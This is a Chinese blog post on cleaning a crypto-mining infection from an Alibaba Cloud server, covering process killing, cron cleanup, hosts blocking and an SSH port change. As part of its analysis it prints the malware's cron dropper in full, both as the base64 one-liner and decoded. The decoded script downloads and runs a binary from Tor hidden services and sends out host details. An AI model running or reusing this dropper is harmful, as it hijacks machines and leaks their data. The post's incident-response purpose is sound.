阿里云服务器被挖矿病毒入侵处理

最新推荐文章于 2023-06-24 10:45:00 发布
最新推荐文章于 2023-06-24 10:45:00 发布
阅读量3.1k 收藏 3
点赞数 1
分类专栏: 实用技巧 文章标签: linux 服务器 centos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ThomasChant/article/details/115509913
版权

前言

最近个人阿里云轻量应用服务器cpu一直满负荷运行,原来是被挖矿病毒入侵了,这里记录一下和病毒斗智斗勇的过程。

杀掉进程

top查看进程id

image-20210408103721987

杀死进程

kill -9 11353 杀死进程

清理定时任务

光杀死进程肯定是不够的,这种挖矿程序一般会通过修改系统定时任务,达到再次执行的目的

检查定时任务

执行crontab -e,看到定时任务里面有一个脚本

10 * * * * /root/.systemd-service.sh > /dev/null 2>&1 &

看下脚本内容cat /root/.systemd-service.sh

#!/bin/bash
exec &>/dev/null
echo bhajQKVmnmwXJTe4r3ZpAgfJzVxELCErQ/WVBdKALcIpzlP8lOUlY7Z8/eyGdDFC
echo YmhhalFLVm1ubXdYSlRlNHIzWnBBZ2ZKelZ4RUxDRXJRL1dWQmRLQUxjSXB6bFA4bE9VbFk3WjgvZXlHZERGQwpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICI1aXhoaWVlem96eHdudmlzb3BneG9iYTZzc2JzcnZkcHhlZHV4YjRqYzZ6eDdzNTZydWZyanphZCIpCgpzb2NreigpIHsKbj0oZG9oLmRlZmF1bHRyb3V0ZXMuZGUgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLmNlbnRyYWxldS5waS1kbnMuY29tIGRvaC5kbnMuc2IgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgZG5zLmZsYXR1c2xpZmlyLmlzIGRvaC5saSBkbnMuZGlnaXRhbGUtZ2VzZWxsc2NoYWZ0LmNoKQpwPSQoZWNobyAiZG5zLXF1ZXJ5P25hbWU9cmVsYXkudG9yMnNvY2tzLmluIikKcz0kKCRjIGh0dHBzOi8vJHtuWyQoKFJBTkRPTSUxMCkpXX0vJHAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAnXG4nfGdyZXAgLUV2IFsuXTB8c29ydCAtdVJ8aGVhZCAtbiAxKQp9CgpmZXhlKCkgewpmb3IgaSBpbiAuICRIT01FIC91c3IvYmluICRkIC92YXIvdG1wIDtkbyBlY2hvIGV4aXQgPiAkaS9pICYmIGNobW9kICt4ICRpL2kgJiYgY2QgJGkgJiYgLi9pICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp9Cgp1KCkgewpzb2NregpmPS9pbnQuJCh1bmFtZSAtbSkKeD0uLyQoZGF0ZXxtZDVzdW18Y3V0IC1mMSAtZC0pCnI9JChjdXJsIC00ZnNTTGsgY2hlY2tpcC5hbWF6b25hd3MuY29tfHxjdXJsIC00ZnNTTGsgaXAuc2IpXyQod2hvYW1pKV8kKHVuYW1lIC1tKV8kKHVuYW1lIC1uKV8kKGlwIGF8Z3JlcCAnaW5ldCAnfGF3ayB7J3ByaW50ICQyJ318bWQ1c3VtfGF3ayB7J3ByaW50ICQxJ30pXyQoY3JvbnRhYiAtbHxiYXNlNjQgLXcwKQokYyAteCBzb2NrczVoOi8vJHM6OTA1MCAkdC5vbmlvbiRmIC1vJHggLWUkciB8fCAkYyAkMSRmIC1vJHggLWUkcgpjaG1vZCAreCAkeDskeDtybSAtZiAkeAp9Cgpmb3IgaCBpbiB0b3Iyd2ViLmluIHRvcjJ3ZWIuaXQgb25pb24uZm91bmRhdGlvbiBvbmlvbi5jb20uZGUgb25pb24uc2ggdG9yMndlYi5zdSAKZG8KaWYgISBscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzOyB0aGVuCmZleGU7dSAkdC4kaApscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvdG1wO3UgJHQuJGgpCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC9kZXYvc2htO3UgJHQuJGgpCmVsc2UKYnJlYWsKZmkKZG9uZQo=|base64 -d|bash

用base64加密了,我们给解密一下

echo YmhhalFLVm1ubXdYSlRlNHIzWnBBZ2ZKelZ4RUxDRXJRL1dWQmRLQUxjSXB6bFA4bE9VbFk3WjgvZXlHZERGQwpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICI1aXhoaWVlem96eHdudmlzb3BneG9iYTZzc2JzcnZkcHhlZHV4YjRqYzZ6eDdzNTZydWZyanphZCIpCgpzb2NreigpIHsKbj0oZG9oLmRlZmF1bHRyb3V0ZXMuZGUgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLmNlbnRyYWxldS5waS1kbnMuY29tIGRvaC5kbnMuc2IgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgZG5zLmZsYXR1c2xpZmlyLmlzIGRvaC5saSBkbnMuZGlnaXRhbGUtZ2VzZWxsc2NoYWZ0LmNoKQpwPSQoZWNobyAiZG5zLXF1ZXJ5P25hbWU9cmVsYXkudG9yMnNvY2tzLmluIikKcz0kKCRjIGh0dHBzOi8vJHtuWyQoKFJBTkRPTSUxMCkpXX0vJHAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAnXG4nfGdyZXAgLUV2IFsuXTB8c29ydCAtdVJ8aGVhZCAtbiAxKQp9CgpmZXhlKCkgewpmb3IgaSBpbiAuICRIT01FIC91c3IvYmluICRkIC92YXIvdG1wIDtkbyBlY2hvIGV4aXQgPiAkaS9pICYmIGNobW9kICt4ICRpL2kgJiYgY2QgJGkgJiYgLi9pICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp9Cgp1KCkgewpzb2NregpmPS9pbnQuJCh1bmFtZSAtbSkKeD0uLyQoZGF0ZXxtZDVzdW18Y3V0IC1mMSAtZC0pCnI9JChjdXJsIC00ZnNTTGsgY2hlY2tpcC5hbWF6b25hd3MuY29tfHxjdXJsIC00ZnNTTGsgaXAuc2IpXyQod2hvYW1pKV8kKHVuYW1lIC1tKV8kKHVuYW1lIC1uKV8kKGlwIGF8Z3JlcCAnaW5ldCAnfGF3ayB7J3ByaW50ICQyJ318bWQ1c3VtfGF3ayB7J3ByaW50ICQxJ30pXyQoY3JvbnRhYiAtbHxiYXNlNjQgLXcwKQokYyAteCBzb2NrczVoOi8vJHM6OTA1MCAkdC5vbmlvbiRmIC1vJHggLWUkciB8fCAkYyAkMSRmIC1vJHggLWUkcgpjaG1vZCAreCAkeDskeDtybSAtZiAkeAp9Cgpmb3IgaCBpbiB0b3Iyd2ViLmluIHRvcjJ3ZWIuaXQgb25pb24uZm91bmRhdGlvbiBvbmlvbi5jb20uZGUgb25pb24uc2ggdG9yMndlYi5zdSAKZG8KaWYgISBscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzOyB0aGVuCmZleGU7dSAkdC4kaApscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvdG1wO3UgJHQuJGgpCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC9kZXYvc2htO3UgJHQuJGgpCmVsc2UKYnJlYWsKZmkKZG9uZQo=|base64 -d

得到脚本内容:

bhajQKVmnmwXJTe4r3ZpAgfJzVxELCErQ/WVBdKALcIpzlP8lOUlY7Z8/eyGdDFC
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "5ixhieezozxwnvisopgxoba6ssbsrvdpxeduxb4jc6zx7s56rufrjzad")

sockz() {
n=(doh.defaultroutes.de dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is doh.li dns.digitale-gesellschaft.ch)
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$($c https://${n[$((RANDOM%10))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1)
}

fexe() {
for i in . $HOME /usr/bin $d /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}

u() {
sockz
f=/int.$(uname -m)
x=./$(date|md5sum|cut -f1 -d-)
r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0)
$c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$r
chmod +x $x;$x;rm -f $x
}

for h in tor2web.in tor2web.it onion.foundation onion.com.de onion.sh tor2web.su 
do
if ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; then
fexe;u $t.$h
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h)
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h)
else
break
fi
done

看脚本内容,大体就是通过几个域名,去获取可执行程序,然后本机运行。将程序中的用到的域名在/etc/hosts中屏蔽

127.0.0.1 tor2web.in
127.0.0.1 tor2web.it
127.0.0.1 onion.foundation
127.0.0.1 onion.com.de
127.0.0.1 onion.sh
127.0.0.1 tor2web.su

删除执行脚本

rm -f /root/.systemd-service.sh

修改定时任务

crontab -e将定时任务屏蔽或 crontab -r直接删除

# 10 * * * * /root/.systemd-service.sh > /dev/null 2>&1 & 屏蔽或删除

如果定时任务没有用到直接停掉服务 service crontabd stop

修改ssh端口

如果以上处理仍然无效,可以考虑修改ssh端口号

修改服务器ssh端口

vim /etc/ssh/sshd_config 修改Port为自定义的端口image-20210408103002119重启ssh服务
service sshd restart

去阿里云控制台中放开端口

image-20210408103317014

参考文章

云服务器tor2web病毒处理记录

Java侠
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
QT连接阿里云服务器的MySql数据库示例
06-10
QT连接阿里云服务器的MySql数据库示例
html登录页面整理
bible521125的专栏
01-19 52万+
3 function r() { var username=document.getElementById("username"); var pass=document.getElementById("password"); if(username.value=="") { alert("请输入用户名"); username.focus(); return; } if
http://mail.163.com/help/help_spam_16.htm?ip=118.186.207.7&hostid=smtp5&time=1358341921
热门推荐
云计算?
01-16 61万+
0INRMumLsiQwT0xVgvYVmNCBWS7mV8LzSeLOZGHzflL3ziBSx+iej3G1syAeYvPZxqagQ0P7mgdX /qgnEWWuIcv4cTR6ZI5QNmqULAGtRkCtCNsphAD7cLBiV7UpV7yvURpKw6H8jHyDDZc8zP5P8QF9 abbRoeoTcPcDs/Ij0+JSX9fkdkqCvmUFYzy/GBb+hMWJ...
linux主机又又中木马了
02-21 1124
一 背景早上就收到朋友的短信,提示阿里云机器有病毒执行,一般病毒木马执行喜欢用 crontab,所以先看看 crontab 的内容:foruin`cat/etc/passwd|...
【云服务器阿里云服务器遭遇挖矿病毒、被远控的解决方法(亲测有效)
小fw学习笔记
01-08 3254
我们都知道,国内市场阿里的主机占有率很高,几乎有5层用户以上都是用的阿里,所以它的IP段时常被扫都是再正常不过,几乎一个小时内就有好几十个IP对服务器进行扫描甚至尝试暴力破解,这是一件很可怕的事。在分析完后,要知道被远控的原因无非就是黑客通过暴力破解你的远程登录密码,但是他们破解你阿里云登录密码几乎是不可能的,登录阿里云需要使用支付宝的二次登录,而且支付宝的密码破解起来也更复杂。相信各位小伙伴们一定也会遇到阿里云服务器被远程操控,中病毒的情况,碰到被攻击的朋友大多数源服务器都是用的阿里云ECS。
解决阿里云服务器被植入挖矿脚本过程
拽着尾巴的鱼儿的博客
06-21 3388
基于学习的便利性,在阿里云服务中购买了云服务器,但是突然被告警提示被挖矿,而且要在一定期限内解决挖矿问题,否则就会被关停服务,本篇对于其处理过程进行一个记录,可能对于挖矿处理也不全面,欢迎各路大神进行评论交流。以上就是今天要讲的内容,本文仅仅简单记录了处理服务器挖矿的流程,记录的不全面,欢迎各路大神探讨交流。
我的服务器挖矿了,原因居然是...
qq_44005305的博客
06-24 856
比特币系统每隔一段时间就会在节点上生成一个随机代码,互联网中的所有设备都可以寻找这个代码,谁先找到就能获得奖励。而寻找代码的过程,就是挖矿。设备通过计算来筛选出符合条件的随机代码,每找到一个随机代码往往需要上万亿次的哈希运算,CPU通常会被顶到100%。为了降低成本,黑客往往会通过入侵的方式,控制别人的计算机来帮自己挖矿
阿里云服务器挖矿的解决方法
qq_47464056的博客
07-25 4778
服务器入侵植入挖矿程序!
详细部署阿里云服务器全过程(图文教程)
01-09
部署云服务器,首先需要的便是购买云服务器,这里我选择的是阿里云服务器,注册实名认证这里就不详细说明了,我购买的是云服务器ECS,可以选择大学生优惠,一个月9.5元,算是很实惠的。 我选择的操作系统是Linux...
阿里云服务器修改网卡后无法连接怎么办
01-09
阿里云服务器修改网卡后如何复原 今天学Nginx配置虚拟主机时,由于必须把动态IP改为静态IP,我把/etc/sysconfig/network-scripts/ifcfg-eth0 文件修改了。重启后我发现 原创文章 26获赞 5访问量 1195 关注 私信 ...
阿里云服务器18核16G15M200G
08-11
阿里云服务器18核16G15M200G系统盘300G数据盘
阿里云服务器安装宝塔教程
05-15
使用阿里云服务器安装宝塔面板教程,阿里云百科以ECS云服务器CentOS操作系统为例,安装宝塔Linux面板,先远程连接到云服务器,然后...阿里云百科来详细说下阿里云服务器安装宝塔面板教程,超简单,一步步跟着操作即可
阿里云服务器网站部署教程
04-02
阿里云服务器网站部署教程
window-2008阿里云服务器搭建经验
08-14
阿里云windows-2008服务器搭建的一些经验,这几天想着总是在自己电脑上搭建服务器环境然后用作项目测试,有些厌倦,并且每次开那么多软件,总会觉得内存下一秒会不会爆掉。就想着在阿里云服务器买一个,不用每次都...
阿里云服务器绑定https
03-29
安装证书 Tomcat支持JKS格式证书,从Tomcat7开始也支持PFX格式证书,两种证书格式任选其一。 文件说明: 证书文件214043592950638.pem,包含两段内容,请不要删除任何一段内容。 如果是证书系统创建的CSR,还包含:...
linux阿里云服务器+nginx.docx
07-14
linux阿里云服务器+nginx
阿里云服务器新建用户具体方法
09-10
本文包括了新建服务器用户和新建MySQL用户的方法,有需要的朋友可以参考一下
使用ESP8266连接阿里云mqtt云服务器
最新发布
07-28
使用ESP8266连接MQTT云服务器,将串口接收到的数据上传至云服务器,同时将接收到从云服务器发送过来的数据串口输出
阿里云Liunx服务器开启新端口
01-07
配置阿里云安全组 准备工作: 登陆阿里云后台,点击左上角菜单,选择云服务器。 选择实例 选择安全组 选择配置规则 添加安全组规则 注: 端口范围填写 xx/xx,可填写范围(80/8080),也可填写(8080/8080)。填写...
asp.net一般处理程序运行到阿里云服务器
05-05
ASP.NET一般处理程序可以在阿里云服务器上运行,但需要在阿里云服务器上安装IIS(Internet Information Services)或者其他支持ASP.NET的Web服务器。同时,需要将ASP.NET处理程序发布到阿里云服务器上,并配置服务器...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值